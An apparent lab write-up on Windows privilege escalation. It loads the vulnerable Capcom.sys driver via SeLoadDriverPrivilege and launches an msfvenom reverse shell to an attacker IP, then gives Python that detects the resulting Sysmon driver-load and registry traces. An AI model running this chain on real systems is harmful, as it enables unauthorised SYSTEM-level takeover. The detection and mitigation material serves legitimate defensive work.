If you see this privilege, it doesn't matter whether it is listed as Disabled: we can enable it and exploit it by uploading a malicious driver, then use that driver to execute our payload.
Upload eoploaddriver_x64.exe, Capcom.sys and ExploitCapcom.exe to the target machine, into a writable directory.
First we need to enable SeLoadDriverPrivilege, which is disabled.
.\eoploaddriver_x64.exe System\\CurrentControlSet\\dfserv C:\\Temp\\Capcom.sys
Now use ExploitCapcom.exe to load Capcom.sys on the target machine.
.\ExploitCapcom.exe LOAD C:\\Temp\\Capcom.sys
After successfully loading Capcom.sys, we can run any command as a privileged user with the EXPLOIT keyword.
.\ExploitCapcom.exe EXPLOIT whoami
Now we can generate a reverse shell with msfvenom. You can also use another reverse shell. On the attacker VM:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.x.x LPORT=4444 -f exe > shell.exe
Upload it to the target machine. Now execute the payload.
.\ExploitCapcom.exe EXPLOIT shell.exe
You will get a reverse shell as SYSTEM.
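On the defending side, the steps above leave two traces worth alerting on: a driver ImagePath value written under a key that is not the machine's Services key, and a kernel driver loaded from a writable directory such as C:\Temp. The Python below is an added example, not part of the original write-up; it flags both in Sysmon-style records (Event ID 13 registry value set, Event ID 6 driver loaded). The sample events, the SID, the hive shown and the trusted-directory list are constructed assumptions.

```python
import ntpath

# Assumption: directories where installed kernel drivers normally live.
TRUSTED_DRIVER_DIRS = (r"c:\windows\system32\drivers", r"c:\windows\system32\driverstore")
SERVICES_KEY = r"hklm\system\currentcontrolset\services" + "\\"

def normalize(path):
    """Drop NT path prefixes, lower-case, and collapse '..' segments."""
    p = path.strip().strip('"')
    for prefix in ("\\??\\", "\\\\?\\"):
        if p.startswith(prefix):
            p = p[len(prefix):]
    p = p.lower()
    if p.startswith("\\systemroot\\"):
        p = r"c:\windows" + p[len("\\systemroot"):]
    return ntpath.normpath(p)

def in_trusted_dir(path):
    p = normalize(path)
    return any(p.startswith(d + "\\") for d in TRUSTED_DRIVER_DIRS)

def suspicious_driver_events(events):
    """Return (rule, evidence) pairs for driver activity outside the usual locations."""
    findings = []
    for ev in events:
        if ev["EventID"] == 6 and not in_trusted_dir(ev["ImageLoaded"]):
            findings.append(("driver-load-outside-system-dir", ev["ImageLoaded"]))
        elif ev["EventID"] == 13:
            key = ev["TargetObject"].lower()
            points_at_driver = ev["Details"].lower().endswith(".sys")
            if key.endswith("\\imagepath") and points_at_driver and not key.startswith(SERVICES_KEY):
                findings.append(("driver-imagepath-outside-services-key", ev["TargetObject"]))
    return findings

# Constructed sample records (field names follow Sysmon; values are made up).
SAMPLE_EVENTS = [
    {"EventID": 13, "Details": r"\??\C:\Temp\Capcom.sys", "TargetObject":
     r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\System\CurrentControlSet\dfserv\ImagePath"},
    {"EventID": 6, "ImageLoaded": r"C:\Temp\Capcom.sys"},
    {"EventID": 6, "ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys"},
    {"EventID": 13, "Details": r"System32\drivers\tcpip.sys",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\Tcpip\ImagePath"},
]

if __name__ == "__main__":
    for rule, evidence in suspicious_driver_events(SAMPLE_EVENTS):
        print(rule, "->", evidence)
```

Restricting which accounts hold SeLoadDriverPrivilege and enabling the Microsoft vulnerable driver blocklist reduce the exposure these rules detect.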